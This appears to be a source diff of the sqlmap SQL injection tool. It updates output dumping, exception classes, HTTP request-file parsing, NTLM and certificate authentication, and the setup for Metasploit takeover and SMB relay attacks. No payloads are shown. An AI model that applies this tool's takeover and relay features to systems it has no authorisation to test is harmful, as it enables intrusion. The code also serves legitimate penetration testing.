-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,16 +22,13 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
-import re
 import os
+import re
 
 from lib.core.common import dataToDumpFile
 from lib.core.data import conf
 from lib.core.data import logger
 
-
 class Dump:
     """
     This class defines methods used to parse and output the results
@@ -43,7 +40,6 @@ class Dump:
         self.__outputFile = None
         self.__outputFP   = None
         
-
     def __write(self, data, n=True):
         if n:
             print data
@@ -56,12 +52,10 @@ class Dump:
 
         conf.loggedToOut = True
         
-
     def setOutputFile(self):
         self.__outputFile = "%s%slog" % (conf.outputPath, os.sep)
         self.__outputFP = open(self.__outputFile, "a")
         
-
     def string(self, header, data, sort=True):
         if isinstance(data, (list, tuple, set)):
             self.lister(header, data, sort)
@@ -82,12 +76,11 @@ class Dump:
         else:
             self.__write("%s:\tNone\n" % header)
             
-
     def lister(self, header, elements, sort=True):
         if elements:
             self.__write("%s [%d]:" % (header, len(elements)))
 
-        if sort == True:
+        if sort:
             try:
                 elements = set(elements)
                 elements = list(elements)
@@ -104,7 +97,6 @@ class Dump:
         if elements:
             self.__write("")
             
-
     def userSettings(self, header, userSettings, subHeader):
         self.__areAdmins = set()
 
@@ -132,8 +124,42 @@ class Dump:
                 self.__write("    %s: %s" % (subHeader, setting))
         print
 
+    def dbColumns(self, dbColumns, colConsider, dbs):
+        for column, dbTables in dbColumns.items():
+            if colConsider == "1":
+                colConsiderStr = "s like '" + column + "' were"
+            else:
+                colConsiderStr = " '%s' was" % column
+
+            msg  = "Column%s found in the " % colConsiderStr
+            msg += "following databases:"
+            self.__write(msg)
+
+            printDbs = {}
+
+            for db, tblData in dbs.items():
+                for tbl, colData in tblData.items():
+                    for col, dataType in colData.items():
+                        if column in col:
+                            if db in printDbs:
+                                if tbl in printDbs[db]:
+                                    printDbs[db][tbl][col] = dataType
+                                else:
+                                    printDbs[db][tbl] = { col: dataType }
+                            else:
+                                printDbs[db] = {}
+                                printDbs[db][tbl] = { col: dataType }
+
+                            continue
+
+            self.dbTableColumns(printDbs)
 
     def dbTables(self, dbTables):
+        if not isinstance(dbTables, dict):
+            self.string("tables", dbTables)
+
+            return
+
         maxlength = 0
 
         for tables in dbTables.values():
@@ -160,7 +186,6 @@ class Dump:
 
             self.__write("+%s+\n" % lines)
 
-
     def dbTableColumns(self, tableColumns):
         for db, tables in tableColumns.items():
             if not db:
@@ -176,11 +201,15 @@ class Dump:
                 for column in colList:
                     colType = columns[column]
                     maxlength1 = max(maxlength1, len(column))
+
+                    if colType is not None:
                         maxlength2 = max(maxlength2, len(colType))
 
                 maxlength1 = max(maxlength1, len("COLUMN"))
-                maxlength2 = max(maxlength2, len("TYPE"))
                 lines1 = "-" * (int(maxlength1) + 2)
+
+                if colType is not None:
+                    maxlength2 = max(maxlength2, len("TYPE"))
                     lines2 = "-" * (int(maxlength2) + 2)
 
                 self.__write("Database: %s\nTable: %s" % (db, table))
@@ -190,24 +219,42 @@ class Dump:
                 else:
                     self.__write("[%d columns]" % len(columns))
 
+                if colType is not None:
                     self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("+%s+" % lines1)
 
                 blank1 = " " * (maxlength1 - len("COLUMN"))
+
+                if colType is not None:
                     blank2 = " " * (maxlength2 - len("TYPE"))
 
+                if colType is not None:
                     self.__write("| Column%s | Type%s |" % (blank1, blank2))
                     self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("| Column%s |" % blank1)
+                    self.__write("+%s+" % lines1)
 
                 for column in colList:
                     colType = columns[column]
                     blank1 = " " * (maxlength1 - len(column))
+
+                    if colType is not None:
                         blank2 = " " * (maxlength2 - len(colType))
                         self.__write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
+                    else:
+                        self.__write("| %s%s |" % (column, blank1))
 
+                if colType is not None:
                     self.__write("+%s+%s+\n" % (lines1, lines2))
-
+                else:
+                    self.__write("+%s+\n" % lines1)
 
     def dbTableValues(self, tableValues):
+        if tableValues is None:
+            return
+
         db = tableValues["__infos__"]["db"]
         if not db:
             db = "All"
@@ -251,16 +298,18 @@ class Dump:
                 info      = tableValues[column]
                 maxlength = int(info["length"])
                 blank     = " " * (maxlength - len(column))
+
                 self.__write("| %s%s" % (column, blank), n=False)
 
                 if not conf.multipleTargets and field == fields:
-                    dataToDumpFile(dumpFP, "\"%s\"" % column)
-                else:
-                    dataToDumpFile(dumpFP, "\"%s\"," % column)
+                    dataToDumpFile(dumpFP, "%s" % column)
+                elif not conf.multipleTargets:
+                    dataToDumpFile(dumpFP, "%s," % column)
 
                 field += 1
 
         self.__write("|\n%s" % separator)
+
         if not conf.multipleTargets:
             dataToDumpFile(dumpFP, "\n")
 
@@ -279,14 +328,15 @@ class Dump:
                     blank = " " * (maxlength - len(value))
                     self.__write("| %s%s" % (value, blank), n=False)
 
-                    if field == fields:
+                    if not conf.multipleTargets and field == fields:
                         dataToDumpFile(dumpFP, "\"%s\"" % value)
-                    else:
+                    elif not conf.multipleTargets:
                         dataToDumpFile(dumpFP, "\"%s\"," % value)
 
                     field += 1
 
             self.__write("|")
+
             if not conf.multipleTargets:
                 dataToDumpFile(dumpFP, "\n")
 
@@ -298,7 +348,6 @@ class Dump:
 
             logger.info("Table '%s.%s' dumped to CSV file '%s'" % (db, table, dumpFileName))
 
-
 # object to manage how to print the retrieved queries output to
 # standard output and sessions file
 dumper = Dump()

lib/core/exception.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,10 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
-import sys
-
 from lib.core.settings import PLATFORM
 from lib.core.settings import PYVERSION
 from lib.core.settings import VERSION
@@ -35,63 +31,51 @@ from lib.core.settings import VERSION_STRING
 class sqlmapConnectionException(Exception):
     pass
 
-
 class sqlmapDataException(Exception):
     pass
 
-
 class sqlmapFilePathException(Exception):
     pass
 
-
 class sqlmapGenericException(Exception):
     pass
 
+class sqlmapMissingDependence(Exception):
+    pass
 
 class sqlmapMissingMandatoryOptionException(Exception):
     pass
 
+class sqlmapMissingPrivileges(Exception):
+    pass
 
 class sqlmapNoneDataException(Exception):
     pass
 
+class sqlmapNotVulnerableException(Exception):
+    pass
 
 class sqlmapRegExprException(Exception):
     pass
 
-
 class sqlmapSyntaxException(Exception):
     pass
 
-
-class sqlmapUndefinedMethod(Exception):
-    pass
-
-
-class sqlmapMissingPrivileges(Exception):
-    pass
-
-
-class sqlmapNotVulnerableException(Exception):
-    pass
-
-
 class sqlmapThreadException(Exception):
     pass
 
+class sqlmapUndefinedMethod(Exception):
+    pass
 
 class sqlmapUnsupportedDBMSException(Exception):
     pass
 
-
 class sqlmapUnsupportedFeatureException(Exception):
     pass
 
-
 class sqlmapValueException(Exception):
     pass
 
-
 def unhandledException():
     errMsg  = "unhandled exception in %s, please copy " % VERSION_STRING
     errMsg += "the command line and the following text and send by e-mail "
@@ -101,12 +85,12 @@ def unhandledException():
     errMsg += "Operating system: %s" % PLATFORM
     return errMsg
 
-
 exceptionsTuple = (
                     sqlmapConnectionException,
                     sqlmapDataException,
                     sqlmapFilePathException,
                     sqlmapGenericException,
+                    sqlmapMissingDependence,
                     sqlmapMissingMandatoryOptionException,
                     sqlmapNoneDataException,
                     sqlmapRegExprException,

lib/core/option.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import cookielib
 import ctypes
 import difflib
@@ -31,19 +29,17 @@ import logging
 import os
 import re
 import socket
-import sys
-import time
 import urllib2
 import urlparse
 
 from ConfigParser import ConfigParser
 
 from lib.core.common import getFileType
+from lib.core.common import normalizePath
+from lib.core.common import ntToPosixSlashes
 from lib.core.common import parseTargetUrl
 from lib.core.common import paths
 from lib.core.common import randomRange
-from lib.core.common import randomStr
-from lib.core.common import readInput
 from lib.core.common import sanitizeStr
 from lib.core.data import conf
 from lib.core.data import kb
@@ -52,6 +48,7 @@ from lib.core.data import paths
 from lib.core.datatype import advancedDict
 from lib.core.exception import sqlmapFilePathException
 from lib.core.exception import sqlmapGenericException
+from lib.core.exception import sqlmapMissingDependence
 from lib.core.exception import sqlmapMissingMandatoryOptionException
 from lib.core.exception import sqlmapMissingPrivileges
 from lib.core.exception import sqlmapSyntaxException
@@ -59,6 +56,9 @@ from lib.core.exception import sqlmapUnsupportedDBMSException
 from lib.core.optiondict import optDict
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
+from lib.core.settings import PGSQL_ALIASES
+from lib.core.settings import ORACLE_ALIASES
+from lib.core.settings import IS_WIN
 from lib.core.settings import PLATFORM
 from lib.core.settings import SITE
 from lib.core.settings import SUPPORTED_DBMS
@@ -68,13 +68,12 @@ from lib.core.update import update
 from lib.parse.configfile import configFileParser
 from lib.parse.queriesfile import queriesParser
 from lib.request.proxy import ProxyHTTPSHandler
+from lib.request.certhandler import HTTPSCertAuthHandler
 from lib.utils.google import Google
 
-
 authHandler  = urllib2.BaseHandler()
 proxyHandler = urllib2.BaseHandler()
 
-
 def __urllib2Opener():
     """
     This function creates the urllib2 OpenerDirector.
@@ -86,12 +85,14 @@ def __urllib2Opener():
     debugMsg = "creating HTTP requests opener object"
     logger.debug(debugMsg)
     
+    if conf.dropSetCookie:
+        opener  = urllib2.build_opener(proxyHandler, authHandler)
+    else:
         conf.cj = cookielib.LWPCookieJar()
         opener  = urllib2.build_opener(proxyHandler, authHandler, urllib2.HTTPCookieProcessor(conf.cj))
 
     urllib2.install_opener(opener)
 
-
 def __feedTargetsDict(reqFile, addedTargetUrls):
     fp = open(reqFile, "r")
 
@@ -100,7 +101,20 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
 
     reqResList = fread.split("======================================================")
 
+    port   = None
+    scheme = None
+
+    if conf.scope:
+        logger.info("using regular expression '%s' for filtering targets" % conf.scope)
+
     for request in reqResList:
+        if scheme is None:
+            schemePort = re.search("\d\d[\:|\.]\d\d[\:|\.]\d\d\s+(http[\w]*)\:\/\/.*?\:([\d]+)", request, re.I)
+
+            if schemePort:
+                scheme = schemePort.group(1)
+                port   = schemePort.group(2)
+
         if not re.search ("^[\n]*(GET|POST).*?\sHTTP\/", request, re.I):
             continue
 
@@ -134,10 +148,12 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
 
                 getPostReq = True
 
+            # GET parameters
             elif "?" in line and "=" in line and ": " not in line:
                 data   = line
                 params = True
 
+            # Cookie and Host headers
             elif ": " in line:
                 key, value = line.split(": ", 1)
 
@@ -146,15 +162,24 @@ def __feedTargetsDict(reqFile, addedTargetUrls):
                 elif key.lower() == "host":
                     host = value
 
+            # POST parameters
+            elif method is not None and method == "POST" and "=" in line:
+                data   = line
+                params = True
+
+        if conf.scope:
+            getPostReq &= re.search(conf.scope, host) is not None
+
         if getPostReq and params:
             if not url.startswith("http"):
-                url = "http://%s%s" % (host, url)
+                url    = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
+                scheme = None
+                port   = None
 
             if not kb.targetUrls or url not in addedTargetUrls:
                 kb.targetUrls.add(( url, method, data, cookie ))
                 addedTargetUrls.add(url)
 
-
 def __setMultipleTargets():
     """
     Define a configuration parameter if we are running in multiple target
@@ -199,7 +224,6 @@ def __setMultipleTargets():
         infoMsg += "testable requests from the targets list"
         logger.info(infoMsg)
 
-
 def __setGoogleDorking():
     """
     This function checks if the way to request testable hosts is through
@@ -247,29 +271,147 @@ def __setGoogleDorking():
         errMsg += "have GET parameters to test for SQL injection"
         raise sqlmapGenericException, errMsg
 
+def __setRequestFromFile():
+    """
+    This function checks if the way to make a HTTP request is through supplied
+    textual file, parses it and saves the information into the knowledge base.
+    """
+
+    if not conf.requestFile:
+        return
+    
+    conf.requestFile = os.path.expanduser(conf.requestFile)
+    
+    infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
+    logger.info(infoMsg)
+
+    if not os.path.isfile(conf.requestFile):
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' does not exist" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    fp = open(conf.requestFile, "r")
+    fread = fp.read()
+    fread = fread.replace("\r", "")
+    fp.close()
+    
+    lines = fread.split("\n")
+    
+    if len(lines) == 0:
+        errMsg  = "the specified HTTP request file "
+        errMsg += "'%s' has no content" % conf.requestFile
+        raise sqlmapFilePathException, errMsg
+    
+    if not (lines[0].upper().startswith("GET ") or lines[0].upper().startswith("POST ")):
+        errMsg =  "the specified HTTP request file "
+        errMsg += "doesn't start with GET or POST keyword"
+        raise sqlmapFilePathException, errMsg
+
+    
+    if lines[0].upper().startswith("GET "):
+        index = 4
+    else:
+        index = 5
+
+    if lines[0].upper().find(" HTTP/") == -1:
+        errMsg  = "the specified HTTP request file " 
+        errMsg += "has a syntax error at line: 1"
+        raise sqlmapFilePathException, errMsg
+        
+    host = None
+    headers = ""
+    page = lines[0][index:lines[0].index(" HTTP/")]
+    
+    if conf.method:
+        warnMsg  = "HTTP method previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.method = lines[0][:index-1]
+
+    for index in xrange(1, len(lines) - 1):
+        line = lines[index]
+        valid = True
+        
+        if len(line) == 0:
+            break
+        
+        headers += line + "\n"
+        
+        items = line.split(': ')
+        if len(items) != 2:
+            valid = False
+        else:
+            if items[0].upper() == "HOST":
+                host = items[1]
+                
+        if not valid:
+            errMsg  = "the specified HTTP request file" 
+            errMsg += "has a syntax error at line: %d" % (index + 1)
+            raise sqlmapFilePathException, errMsg
+    
+    if conf.headers and headers:
+        warnMsg  = "HTTP headers previously set. overriding it with "
+        warnMsg += "the value(s) supplied from the HTTP request file"
+        logger.warn(warnMsg)
+    conf.headers = headers.strip("\n")
+    
+    if fread.find("\n\n") != -1:
+        if conf.data:
+            warnMsg  = "HTTP POST data previously set. overriding it with "
+            warnMsg += "the value supplied from the HTTP request file"
+            logger.warn(warnMsg)
+        conf.data = fread[fread.index('\n\n')+2:].strip("\n")
+    
+    if conf.url:
+        warnMsg  = "target url previously set. overriding it with "
+        warnMsg += "the value supplied from the HTTP request file"
+        logger.warn(warnMsg)
+        
+    if host:
+        conf.url = "%s%s" % (host, page)
+    else:
+        errMsg  = "mandatory HTTP header HOST is missing in "
+        errMsg += "the HTTP request file"
+        raise sqlmapFilePathException, errMsg
             
 def __setMetasploit():
     if not conf.osPwn and not conf.osSmb and not conf.osBof:
         return
 
+    debugMsg = "setting the takeover out-of-band functionality"
+    logger.debug(debugMsg)
+
+    msfEnvPathExists = False
+
+    if IS_WIN:
+        warnMsg  = "Metasploit's msfconsole and msfcli are not supported "
+        warnMsg += "on the native Windows Ruby interpreter. Please "
+        warnMsg += "install Metasploit, Python interpreter and sqlmap on "
+        warnMsg += "Cygwin or use Linux in VMWare to use sqlmap takeover "
+        warnMsg += "out-of-band features. sqlmap will now continue "
+        warnMsg += "without calling any takeover feature"
+        logger.warn(warnMsg)
+
+        conf.osPwn = None
+        conf.osSmb = None
+        conf.osBof = None
+
+        return
+
     if conf.osSmb:
         isAdmin = False
 
-        if "win" in PLATFORM:
-            isAdmin = ctypes.windll.shell32.IsUserAnAdmin()
-
-            if isinstance(isAdmin, (int, float, long)) and isAdmin == 1:
-                isAdmin = True
-
-        elif "linux" in PLATFORM:
+        if "linux" in PLATFORM or "darwin" in PLATFORM:
             isAdmin = os.geteuid()
 
             if isinstance(isAdmin, (int, float, long)) and isAdmin == 0:
                 isAdmin = True
 
-        # TODO: add support for Mac OS X
-        #elif "darwin" in PLATFORM:
-        #    pass
+        elif IS_WIN:
+            isAdmin = ctypes.windll.shell32.IsUserAnAdmin()
+
+            if isinstance(isAdmin, (int, float, long)) and isAdmin == 1:
+                isAdmin = True
 
         else:
             warnMsg  = "sqlmap is not able to check if you are running it "
@@ -281,24 +423,19 @@ def __setMetasploit():
 
             isAdmin = True
 
-        if isAdmin != True:
-            errMsg  = "you need to run sqlmap as an administrator/root "
+        if isAdmin is not True:
+            errMsg  = "you need to run sqlmap as an Administrator/root "
             errMsg += "user if you want to perform a SMB relay attack "
             errMsg += "because it will need to listen on a user-specified "
             errMsg += "SMB TCP port for incoming connection attempts"
             raise sqlmapMissingPrivileges, errMsg
 
-    debugMsg = "setting the out-of-band functionality"
-    logger.debug(debugMsg)
-
-    msfEnvPathExists = False
-
     if conf.msfPath:
-        condition  = os.path.exists(os.path.normpath(conf.msfPath))
-        condition &= os.path.exists(os.path.normpath("%s/msfcli" % conf.msfPath))
-        condition &= os.path.exists(os.path.normpath("%s/msfconsole" % conf.msfPath))
-        condition &= os.path.exists(os.path.normpath("%s/msfencode" % conf.msfPath))
-        condition &= os.path.exists(os.path.normpath("%s/msfpayload" % conf.msfPath))
+        condition  = os.path.exists(normalizePath(conf.msfPath))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfcli")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfconsole")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfencode")))
+        condition &= os.path.exists(normalizePath(os.path.join(conf.msfPath, "msfpayload")))
 
         if condition:
             debugMsg  = "provided Metasploit Framework 3 path "
@@ -319,24 +456,25 @@ def __setMetasploit():
         warnMsg += "Framework 3 is installed"
         logger.warn(warnMsg)
 
-    if msfEnvPathExists != True:
+    if not msfEnvPathExists:
         warnMsg  = "sqlmap is going to look for Metasploit Framework 3 "
         warnMsg += "installation into the environment paths"
         logger.warn(warnMsg)
 
         envPaths = os.environ["PATH"]
 
-        if "win" in PLATFORM:
+        if IS_WIN:
             envPaths = envPaths.split(";")
         else:
             envPaths = envPaths.split(":")
 
         for envPath in envPaths:
-            condition  = os.path.exists(os.path.normpath(envPath))
-            condition &= os.path.exists(os.path.normpath("%s/msfcli" % envPath))
-            condition &= os.path.exists(os.path.normpath("%s/msfconsole" % envPath))
-            condition &= os.path.exists(os.path.normpath("%s/msfencode" % envPath))
-            condition &= os.path.exists(os.path.normpath("%s/msfpayload" % envPath))
+            envPath    = envPath.replace(";", "")
+            condition  = os.path.exists(normalizePath(envPath))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfcli")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfconsole")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfencode")))
+            condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))
 
             if condition:
                 infoMsg  = "Metasploit Framework 3 has been found "
@@ -348,12 +486,11 @@ def __setMetasploit():
 
                 break
 
-    if msfEnvPathExists != True:
+    if not msfEnvPathExists:
         errMsg  = "unable to locate Metasploit Framework 3 installation. "
         errMsg += "Get it from http://metasploit.com/framework/download/"
         raise sqlmapFilePathException, errMsg
 
-
 def __setWriteFile():
     if not conf.wFile:
         return
@@ -372,9 +509,8 @@ def __setWriteFile():
 
     conf.wFileType = getFileType(conf.wFile)
 
-
 def __setUnionTech():
-    if conf.uTech == None:
+    if conf.uTech is None:
         conf.uTech = "NULL"
 
         return
@@ -397,7 +533,6 @@ def __setUnionTech():
         debugMsg += "'%s'" % uTechOriginal
         logger.debug(debugMsg)
 
-
 def __setOS():
     """
     Force the back-end DBMS operating system option.
@@ -420,7 +555,6 @@ def __setOS():
         errMsg += "you."
         raise sqlmapUnsupportedDBMSException, errMsg
 
-
 def __setDBMS():
     """
     Force the back-end DBMS option.
@@ -433,8 +567,10 @@ def __setDBMS():
     logger.debug(debugMsg)
 
     conf.dbms = conf.dbms.lower()
-    firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
-                               "|".join([alias for alias in MYSQL_ALIASES]))
+    firstRegExp = "(%s|%s|%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
+                                     "|".join([alias for alias in MYSQL_ALIASES]),
+                                     "|".join([alias for alias in PGSQL_ALIASES]),
+                                     "|".join([alias for alias in ORACLE_ALIASES]))
     dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, conf.dbms)
 
     if dbmsRegExp:
@@ -449,12 +585,10 @@ def __setDBMS():
         errMsg += "fingerprint it for you."
         raise sqlmapUnsupportedDBMSException, errMsg
 
-
 def __setThreads():
     if not isinstance(conf.threads, int) or conf.threads <= 0:
         conf.threads = 1
 
-
 def __setHTTPProxy():
     """
     Check and set the HTTP proxy to pass by all HTTP requests.
@@ -463,10 +597,10 @@ def __setHTTPProxy():
     global proxyHandler
 
     if not conf.proxy: 
+        if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy:
+            proxyHandler = urllib2.ProxyHandler({})
         return
 
-    parseTargetUrl()
-
     debugMsg = "setting the HTTP proxy to pass by all HTTP requests"
     logger.debug(debugMsg)
 
@@ -478,7 +612,10 @@ def __setHTTPProxy():
     __port         = None
 
     if len(__hostnamePort) == 2:
+        try:
             __port = int(__hostnamePort[1])
+        except:
+            pass #drops into the next check block
 
     if not __scheme or not __hostname or not __port:
         errMsg = "proxy value must be in format 'http://url:port'"
@@ -488,51 +625,50 @@ def __setHTTPProxy():
 
     # Workaround for http://bugs.python.org/issue1424152 (urllib/urllib2:
     # HTTPS over (Squid) Proxy fails) as long as HTTP over SSL requests
-    # can't be tunneled over an HTTP proxy natively by Python urllib2
-    # standard library
+    # can't be tunneled over an HTTP proxy natively by Python (<= 2.5)
+    # urllib2 standard library
     if conf.scheme == "https":
         proxyHandler = ProxyHTTPSHandler(__proxyString)
     else:
         proxyHandler = urllib2.ProxyHandler({"http": __proxyString})
 
-
 def __setHTTPAuthentication():
     """
-    Check and set the HTTP authentication method (Basic or Digest),
-    username and password to perform HTTP requests with.
+    Check and set the HTTP(s) authentication method (Basic, Digest, NTLM or Certificate),
+    username and password for first three methods, or key file and certification file for
+    certificate authentication
     """
 
     global authHandler
 
-    if not conf.aType and not conf.aCred:
+    if not conf.aType and not conf.aCred and not conf.aCert:
         return
 
     elif conf.aType and not conf.aCred:
-        errMsg  = "you specified the HTTP Authentication type, but "
+        errMsg  = "you specified the HTTP authentication type, but "
         errMsg += "did not provide the credentials"
         raise sqlmapSyntaxException, errMsg
 
     elif not conf.aType and conf.aCred:
-        errMsg  = "you specified the HTTP Authentication credentials, "
+        errMsg  = "you specified the HTTP authentication credentials, "
         errMsg += "but did not provide the type"
         raise sqlmapSyntaxException, errMsg
 
-    parseTargetUrl()
-
-    debugMsg = "setting the HTTP Authentication type and credentials"
+    if not conf.aCert:
+        debugMsg = "setting the HTTP authentication type and credentials"
         logger.debug(debugMsg)
     
         aTypeLower = conf.aType.lower()
     
-    if aTypeLower not in ( "basic", "digest" ):
-        errMsg  = "HTTP Authentication type value must be "
-        errMsg += "Basic or Digest"
+        if aTypeLower not in ( "basic", "digest", "ntlm" ):
+            errMsg  = "HTTP authentication type value must be "
+            errMsg += "Basic, Digest or NTLM"
             raise sqlmapSyntaxException, errMsg
     
         aCredRegExp = re.search("^(.*?)\:(.*?)$", conf.aCred)
     
         if not aCredRegExp:
-        errMsg  = "HTTP Authentication credentials value must be "
+            errMsg  = "HTTP authentication credentials value must be "
             errMsg += "in format username:password"
             raise sqlmapSyntaxException, errMsg
     
@@ -544,9 +680,41 @@ def __setHTTPAuthentication():
     
         if aTypeLower == "basic":
             authHandler = urllib2.HTTPBasicAuthHandler(passwordMgr)
+    
         elif aTypeLower == "digest":
             authHandler = urllib2.HTTPDigestAuthHandler(passwordMgr)
     
+        elif aTypeLower == "ntlm":
+            try:
+                from ntlm import HTTPNtlmAuthHandler
+            except ImportError, _:
+                errMsg  = "sqlmap requires Python NTLM third-party library "
+                errMsg += "in order to authenticate via NTLM, "
+                errMsg += "http://code.google.com/p/python-ntlm/"
+                raise sqlmapMissingDependence, errMsg
+    
+            authHandler = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passwordMgr)
+    else:
+        debugMsg = "setting the HTTP(s) authentication certificate"
+        logger.debug(debugMsg)
+        
+        aCertRegExp = re.search("^(.+?),\s*(.+?)$", conf.aCert)
+    
+        if not aCertRegExp:
+            errMsg  = "HTTP authentication certificate option "
+            errMsg += "must be in format key_file,cert_file"
+            raise sqlmapSyntaxException, errMsg
+    
+        #os.path.expanduser for support of paths with ~
+        key_file = os.path.expanduser(aCertRegExp.group(1))
+        cert_file = os.path.expanduser(aCertRegExp.group(2))
+        
+        for file in (key_file, cert_file):
+            if not os.path.exists(file):
+                errMsg  = "File '%s' doesn't exist" % file
+                raise sqlmapSyntaxException, errMsg
+        
+        authHandler = HTTPSCertAuthHandler(key_file, cert_file)
 
 def __setHTTPMethod():
     """
@@ -569,8 +737,10 @@ def __setHTTPMethod():
     debugMsg = "setting the HTTP method to %s" % conf.method
     logger.debug(debugMsg)
 
-
 def __setHTTPExtraHeaders():
+    if conf.hostname:
+        conf.httpHeaders.append(("Host", conf.hostname))
+
     if conf.headers:
         debugMsg = "setting extra HTTP headers"
         logger.debug(debugMsg)
@@ -588,7 +758,6 @@ def __setHTTPExtraHeaders():
         conf.httpHeaders.append(("Accept-Language", "en-us,en;q=0.5"))
         conf.httpHeaders.append(("Accept-Charset", "ISO-8859-15,utf-8;q=0.7,*;q=0.7"))
 
-
 def __defaultHTTPUserAgent():
     """
     @return: default sqlmap HTTP User-Agent header
@@ -597,6 +766,12 @@ def __defaultHTTPUserAgent():
 
     return "%s (%s)" % (VERSION_STRING, SITE)
 
+    # Firefox 3 running on Ubuntu 9.04 updated at April 2009
+    #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
+
+    # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english
+    # updated at March 2009
+    #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
 
 def __setHTTPUserAgent():
     """
@@ -661,7 +836,6 @@ def __setHTTPUserAgent():
     logMsg += "file '%s': %s" % (conf.userAgentsFile, __userAgent)
     logger.info(logMsg)
 
-
 def __setHTTPReferer():
     """
     Set the HTTP Referer
@@ -673,7 +847,6 @@ def __setHTTPReferer():
 
         conf.httpHeaders.append(("Referer", conf.referer))
 
-
 def __setHTTPCookies():
     """
     Set the HTTP Cookie header
@@ -686,7 +859,6 @@ def __setHTTPCookies():
         conf.httpHeaders.append(("Connection", "Keep-Alive"))
         conf.httpHeaders.append(("Cookie", conf.cookie))
 
-
 def __setHTTPTimeout():
     """
     Set the HTTP timeout
@@ -709,7 +881,6 @@ def __setHTTPTimeout():
 
     socket.setdefaulttimeout(conf.timeout)
 
-
 def __cleanupOptions():
     """
     Cleanup configuration attributes.
@@ -740,24 +911,23 @@ def __cleanupOptions():
         conf.delay = float(conf.delay)
 
     if conf.rFile:
-        conf.rFile = os.path.normpath(conf.rFile.replace("\\", "/"))
+        conf.rFile = normalizePath(ntToPosixSlashes(conf.rFile))
 
     if conf.wFile:
-        conf.wFile = os.path.normpath(conf.wFile.replace("\\", "/"))
+        conf.wFile = normalizePath(ntToPosixSlashes(conf.wFile))
 
     if conf.dFile:
-        conf.dFile = os.path.normpath(conf.dFile.replace("\\", "/"))
+        conf.dFile = normalizePath(ntToPosixSlashes(conf.dFile))
 
     if conf.msfPath:
-        conf.msfPath = os.path.normpath(conf.msfPath.replace("\\", "/"))
+        conf.msfPath = normalizePath(ntToPosixSlashes(conf.msfPath))
 
     if conf.tmpPath:
-        conf.tmpPath = os.path.normpath(conf.tmpPath.replace("\\", "/"))
+        conf.tmpPath = normalizePath(ntToPosixSlashes(conf.tmpPath))
 
     if conf.googleDork or conf.list:
         conf.multipleTargets = True
 
-
 def __setConfAttributes():
     """
     This function set some needed attributes into the configuration
@@ -783,16 +953,18 @@ def __setConfAttributes():
     conf.paramNegative   = False
     conf.path            = None
     conf.port            = None
+    conf.progressWidth   = 54
     conf.retriesCount    = 0
     conf.scheme          = None
     #conf.seqMatcher      = difflib.SequenceMatcher(lambda x: x in " \t")
     conf.seqMatcher      = difflib.SequenceMatcher(None)
+    conf.seqLock         = None
     conf.sessionFP       = None
     conf.start           = True
+    conf.threadContinue  = True
     conf.threadException = False
     conf.wFileType       = None
 
-
 def __setKnowledgeBaseAttributes():
     """
     This function set some needed attributes into the knowledge base
@@ -811,7 +983,7 @@ def __setKnowledgeBaseAttributes():
     kb.dbmsDetected   = False
 
     # Active (extensive) back-end DBMS fingerprint
